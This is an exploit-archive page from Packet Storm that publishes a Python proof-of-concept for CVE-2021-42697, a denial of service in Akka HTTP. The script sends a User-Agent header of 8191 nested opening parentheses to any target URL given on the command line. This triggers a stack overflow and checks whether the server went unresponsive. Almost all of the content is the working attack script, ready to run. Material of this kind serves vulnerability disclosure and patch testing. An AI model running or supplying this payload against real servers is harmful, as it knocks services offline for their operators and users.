exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

Akka HTTP 10.1.14 Denial Of Service

Akka HTTP 10.1.14 Denial Of Service
Posted May 11, 2022
Authored by cxosmo

Akka HTTP version 10.1.14 suffers from a denial of service vulnerability.

tags | exploit, web, denial of service
advisories | CVE-2021-42697
SHA-256 | 30ba845af8fffb67fd508290e5e3f00582f741016d66ed94f4ec2cfe0357030c

Akka HTTP 10.1.14 Denial Of Service

Change Mirror Download
# Exploit Title: Akka HTTP Denial of Service via Nested Header Comments
# Date: 18/4/2022
# Exploit Author: cxosmo
# Vendor Homepage: https://akka.io
# Software Link: https://github.com/akka/akka-http
# Version: Akka HTTP 10.1.x < 10.1.15 & 10.2.x < 10.2.7
# Tested on: Akka HTTP 10.2.4, Ubuntu
# CVE : CVE-2021-42697

import argparse
import logging
import requests

# Logging config
logging.basicConfig(level=logging.INFO, format="")
log = logging.getLogger()

def send_benign_request(url, verify=True):
log.info(f"Sending benign request to {url} for checking reachability...")
try:
r = requests.get(url)
log.info(f"Benign request returned following status code: {r.status_code}")
return True
except Exception as e:
log.info(f"The following exception was encountered: {e}")
return False

def send_malicious_request(url, verify=True):
log.info(f"Sending malicious request to {url}")
# Akka has default HTTP header limit of 8192; 8191 sufficient to trigger stack overflow per 10.2.4 testing
nested_comment_payload = "("*8191
headers = {'User-Agent': nested_comment_payload}
try:
r = requests.get(url, headers=headers)
log.info(f"Request returned following status code: {r.status_code}")
# Expected exception to be returned if server is DoSed successfully
except requests.exceptions.RequestException as e:
if "Remote end closed connection without response" in str(e):
log.info(f"The server is unresponsive per {e}: DoS likely successful")
except Exception as e:
log.info(f"The following exception was encountered: {e}")

if __name__ == "__main__":
# Parse command line
parser = argparse.ArgumentParser(formatter_class=argparse.RawDescriptionHelpFormatter)
required_arguments = parser.add_argument_group('required arguments')
required_arguments.add_argument("-t", "--target",
help="Target URL for vulnerable Akka server (e.g. https://localhost)",
required="True", action="store")
parser.add_argument("-k", "--insecure",
help="Disable verification of SSL/TLS certificate",
action="store_false", default=True)
args = parser.parse_args()

# Send requests: first is connectivity check, second is DoS attempt
if send_benign_request(args.target, args.insecure):
send_malicious_request(args.target, args.insecure)


Login or Register to add favorites

File Archive:

December 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Dec 1st
    0 Files
  • 2
    Dec 2nd
    41 Files
  • 3
    Dec 3rd
    25 Files
  • 4
    Dec 4th
    0 Files
  • 5
    Dec 5th
    0 Files
  • 6
    Dec 6th
    0 Files
  • 7
    Dec 7th
    0 Files
  • 8
    Dec 8th
    0 Files
  • 9
    Dec 9th
    0 Files
  • 10
    Dec 10th
    0 Files
  • 11
    Dec 11th
    0 Files
  • 12
    Dec 12th
    0 Files
  • 13
    Dec 13th
    0 Files
  • 14
    Dec 14th
    0 Files
  • 15
    Dec 15th
    0 Files
  • 16
    Dec 16th
    0 Files
  • 17
    Dec 17th
    0 Files
  • 18
    Dec 18th
    0 Files
  • 19
    Dec 19th
    0 Files
  • 20
    Dec 20th
    0 Files
  • 21
    Dec 21st
    0 Files
  • 22
    Dec 22nd
    0 Files
  • 23
    Dec 23rd
    0 Files
  • 24
    Dec 24th
    0 Files
  • 25
    Dec 25th
    0 Files
  • 26
    Dec 26th
    0 Files
  • 27
    Dec 27th
    0 Files
  • 28
    Dec 28th
    0 Files
  • 29
    Dec 29th
    0 Files
  • 30
    Dec 30th
    0 Files
  • 31
    Dec 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2024 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close